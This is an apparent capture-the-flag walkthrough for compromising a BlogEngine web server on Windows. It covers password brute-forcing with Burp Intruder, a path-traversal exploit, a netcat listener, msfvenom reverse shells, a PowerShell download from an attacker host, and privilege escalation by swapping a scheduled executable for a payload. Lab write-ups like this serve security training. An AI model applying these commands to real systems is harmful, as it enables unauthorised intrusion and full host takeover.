Navigate to the Application and explore the features. You will notice a Login page.
We need to identify a possible username for brute-forcing the credentials. When we look at the blog post, we can see an author named “admin” or “administrator”.
Using Burp Intruder, we can brute-force the password using Seclist’s common credentials:
10-million-password-list-top-100.txt
10-million-password-list-top-500.txt
10-million-password-list-top-1000.txt
10-million-password-list-top-10000.txt
10-million-password-list-top-100000.txt
We found the password: 1qaz2wsx
When we login, we can identify the version of blogengine.
Search for exploits in exploit-db. Choose the verified exploit:
Save the file as PostView.acsx
Once the file is uploaded, we can see the file in File manager.
Start a nc listener in the attacker machine: nc -lvnp 4444
Navigate to <Target Machine>/?theme=../../App_Data/files
Once you gain initial access to the server, we will pivot from netcat to a more stable shell.
Generate a reverse shell exe;
msfvenom -p windows/shell_reverse_tcp LHOST=[Attacker IP] LPORT=3333 -f exe -o shell-x86.exe
Download the shell and Winpeas to C:\Windows\Temp\ (this is world writable).
We can run winPEAS.bat and we can see the uncommon service “Windows Scheduler” running.
cd to C:\PROGRA~2\SYSTEM~1
Examine the files in the directory to see if there are any useful information.
In the Events folder, we can see that Message.exe is being executed by Administrator periodically.
Replace the Message.exe with another reverse shell payload. Rename the existing Message.exe to old_message.exe
In Attacker machine, generate the reverse shell:
msfvenom -p windows/shell_reverse_tcp LHOST=[ATTACKER IP] LPORT=5555 -f exe -o Message.exe
Download the Message.exe (reverse shell) to the folder:
powershell -c wget "http://[ATTACKER IP]/Message.exe" -outfile "Message.exe"
cd C:\Users\Administrator\Desktop and we can see the root.txt flag.
Be First to Comment